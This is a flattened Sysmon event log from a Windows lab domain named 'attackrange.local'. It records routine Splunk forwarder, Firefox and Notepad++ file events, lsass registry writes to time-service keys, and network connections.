07:51:00.306{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_074929MD5=B0BABD45444F02C291E17FB7FD48A7A1,SHA256=B658EC900F8BC86A71BF2F61A540A626358B47CAC99CCA6BAC5BD90CBF1133B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807315Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:01.726{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B7B904E749142DCF03710CAD51C90B5,SHA256=6E2A7A5A39D95390068748CE0807195A931F9FBA6D4F3E591A9DB6FF938C1BDA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048140Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:01.672{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=350067C8B5197F7B4DB58C8F818E084B,SHA256=E2E0C6D43AA7497A5E802852308C8D083AE4EC51669871077AE4752CB0535F02,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048139Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:01.637{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048141Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:02.675{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5CB8B74CA82537798B91AACEAA681AE,SHA256=DFCB33910ACBC32E2D63C575D1B6DF4EB74ACB775E3613BAC9D865E879D6C727,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807316Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:02.742{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EEFD4BA0F407E124DFADDCC7E11FBA7,SHA256=F046327D35DDAFDC44150AAA98877D172E4677E14D57AFF0C679A7297EB9A0C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807317Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:03.805{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E57F8CA295F4F44A651CAB3F77884C3C,SHA256=1C5BEAF87E932876E727F56A1D385DD8B5FB7727D57A09B945A0DF28A3669267,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048142Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:03.696{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D27BC7FCAC362C14A4E3DFE7D3804718,SHA256=A28C7D99B71BC537E42E6A0ACEC8E783BF6CB322EF3481902C6168C2CB430902,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807329Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:04.836{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAC02AF25C7EE3E943E74E8AA3F1F702,SHA256=03B15068EF2DEB82C1A431975AA3FB5B2A5ACBC9F054DE17C2B34A820A02C842,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048146Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:04.710{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BB634F21049BA86FB4C1F52C4AE8E86,SHA256=D02A1CA4B8258681FFC41D1F4F8E6C20CC770709A313E97883819024A970FC88,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000807328Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:51:04.523{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x8000000000000000807327Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:51:04.523{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f60f4e6) 13241300x8000000000000000807326Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:51:04.523{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776ea-0x4855b5d5) 13241300x8000000000000000807325Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:51:04.523{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f2-0xaa1a1dd5) 13241300x8000000000000000807324Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:51:04.523{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fb-0x0bde85d5) 13241300x8000000000000000807323Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:51:04.523{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x8000000000000000807322Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:51:04.523{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f60f4e6) 13241300x8000000000000000807321Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:51:04.523{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776ea-0x4855b5d5) 13241300x8000000000000000807320Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:51:04.523{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f2-0xaa1a1dd5) 13241300x8000000000000000807319Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:51:04.523{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fb-0x0bde85d5) 354300x8000000000000000807318Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:03.218{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57247-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048145Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:04.557{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B745DA195616D4A8D272BC6AE9FF05CC,SHA256=53BF429ACE66C6D37B9C70DDEED133FD146E60675C9B1E0C42A37BFB431E4A28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048144Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:04.557{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EE0DA706F9E8F44D1A7B4C07DC48B571,SHA256=D24533168FD8B35725F36E5FC95CB334367A94C7C71A6F44821589A5D5018273,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048143Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:55.656{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51007-false10.0.1.12-8000- 23542300x8000000000000000807330Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:05.836{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4337FB2156FE5AECA3D162D76C18F69,SHA256=E58BBAAA0D08877DA7B681A51990D1E820032E77D44675211FE5E26AA856870D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048148Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:05.726{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D107016A57B597304C12EE5A82710B55,SHA256=3017BA855BA4CED9B0C52A4C984EC16D7F85AE27CD9A0AFFC288044F7ED08E69,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048147Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:56.476{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-62282-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001048154Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:06.757{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F7C4E7806761B0170350377DD0978F6,SHA256=BC11844BABDFE53D87C5A106555E345B541946BAED5BDA05E87E22AC8D3A13EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807331Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:06.883{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=812A2CEE96B0BC5657727127FA62315B,SHA256=D68BB85617BEFF62EC07B22D25E6DD24A4852846CF53CAF16FED03B898EA591A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048153Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:06.241{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048152Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:06.194{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-57B0-60E8-6810-00000000CF01}7548C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001048151Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:06.194{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-57B0-60E8-6810-00000000CF01}7548C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001048150Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:51:06.194{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.7548.372.164343716C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001048149Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:51:06.194{466BC892-57B0-60E8-6810-00000000CF01}7548\chrome.7548.372.164343716C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001048156Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:07.794{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C227C27EC706740448572FF97CE0072E,SHA256=79F93F07EC12C0B0BDAC6498CFE9E0BBB2340EBC3B54846AF826700F03264926,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807332Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:07.898{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FA8A172FCD08C3CC6231348829B6AF6,SHA256=D0A2C95749982CBBD2DA71B41DA3D04F6EF6642358105749877F80B18E093B99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048155Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:07.310{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_074929MD5=9095167B378E8F96262921CF6C864383,SHA256=85AB5FCC73CB8B724D5B1D5ED0B5EE91E5C617D7D6ED74D3CA76F8602DA9D3CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807333Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:08.914{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2F800165A10CF893185180BC9E311B6,SHA256=42022999FC752DCD898B174271ADFFDB98386BBD4D894974A5393CE153D93E76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048157Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:08.824{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82A9567375CAEFC5C9E175B628E12E4D,SHA256=BA73713C30EE6E9832CF16142F16219F5BE57F6C50BF140595E3569A96B3DFE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807335Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:09.929{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0606FA6AC1270F3DB4FD78964115E00D,SHA256=B1E1A009B3C47FF6739646B695CA62320F915FEF691CA10ED39F1CCF404387B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048158Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:09.854{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD4ED62C082AB8EE17347D40523C414F,SHA256=12E1CFB22DF83B1922CA28A109FAE8F3EAAFA63B4C1D1255A249F2CF661017EF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807334Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:08.359{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57248-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048171Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:10.876{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75BAF384B683D925EBCAB9B405303E84,SHA256=BC18DFB5114F25167B4FCCE295B2718A257D9D2B003E450F6BF94CAFD23654A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807336Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:10.945{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=793917611AB8B5A7F83F428A92A80197,SHA256=5BC01CD90F157DEB5326B70F17D739F7F291B78C87B5F4B4423CA313D2653304,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048170Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:10.407{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=921653EED3603960A89B042310479257,SHA256=DBBD0B93A558067EFDEF430802F2D1EAF5639EB5EF9A234E445EC6B81D8813A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048169Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:10.407{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2DF203F7FD396B1E920FAE13CAAB40E4,SHA256=CC21EC9BF186EB38A27128824943C40CDF7925A48C46BCB7A82DC95A4AA40E1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048168Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:10.407{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8CA5C73F78179208B7C52EB46553C509,SHA256=64A2F9066F693397849E6FC262C466AE671B8F1945D9020BCFBC8B75FB1DDDC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048167Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:10.407{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=898A4B3AD08AAB0CBFB633ABC737241D,SHA256=2C906CDDE9D024E9E64895585E908A881F41C74EF88DEB6FA70A92A128BBD8F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048166Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:10.407{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4E78CADF655A97B9C33CFDA96B2E6248,SHA256=28082A58EDD8346DCD7D23C54090B052ACA8EF6A7AD57ACFEA47919F782DA130,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048165Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:10.407{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7E8DA86E31156EE46B9E2BDEAAA57D26,SHA256=9C0467EECAEC09AB1852A371B289348E879922B855AA886FAEE73E6682348E13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048164Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:10.407{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=863739EAA029A51C5885CA2EAEC6853B,SHA256=1F4AC8EC13CB01021218AD87363D4D48C2D3FDC69C032000B0600974E1AF1F87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048163Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:10.407{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C1BD80F540360177BE1F63B70069E000,SHA256=82DA27EE5520CB18C87A333B58683A41EF9D78703E04F9393B78E41F3C05E12E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048162Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:10.407{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=02D63322908BD0CBED310CF5F41CFE73,SHA256=7BE42ADC30F6777F42F0886AEB29D884CA8EF817F89831314D664BF626EE7613,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048161Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:10.407{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 